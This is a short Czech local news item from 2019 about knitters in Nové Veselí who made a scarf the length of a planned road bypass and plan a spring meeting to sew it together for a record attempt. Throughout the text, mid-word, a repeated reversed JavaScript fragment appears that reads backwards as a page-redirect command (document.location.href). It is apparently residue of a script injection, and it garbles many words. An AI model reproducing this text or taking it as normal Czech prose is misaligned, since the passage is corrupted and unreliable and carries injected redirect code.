Rainbow page separator

Novoveselské pletařky se na jaře sejdou při sešívání šály

Čtvrtek, 26. prosince 2019

Nové Veselí / S více než půlročním časovým předstihem před dokončením obchvatu Nového Veselí se v březnu sejdou novoveselské dámy, jež před časem upletly šálu, kterou hodlají položit na více než pět kilometrů dlouhou silniční přeložku. Obchvat má být ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tov příští rok v říjnu. „S tím je spojené položení šály, její následné přeměření a zapsání rekordu o nejdelší šálu lemující silniční obchvat. Na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to akci je třeba se připravit, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bych opět pozvala pletařky, podporovatele či dodavatele materiálu na další setkání, ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát ‚sešívací‘. Uskuteční se během března a jeho hlavní náplní bude sešívání šály po zhruba s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to metrech k získání menšího počtu kusů. Bude s nimi lepší manipulace při přepravě,“ uvedla za pletařky Jitka Kalasová.
Ženy začaly šálu v délce plánovaného obchvatu městečka plést v srpnu 2015, kdy o jeho realizaci po dlouhých letech stále ještě nebylo rozhodnu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, a dokončily dílo loni na podzim. Chtějí obchva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovou šálu rozložit na nové přeložce krajské silnice II/353, jež obejde Nové Veselí a Budeč, a současně se pokusit za dohledu Agentury Dobrý den Pelhřimov o český rekord.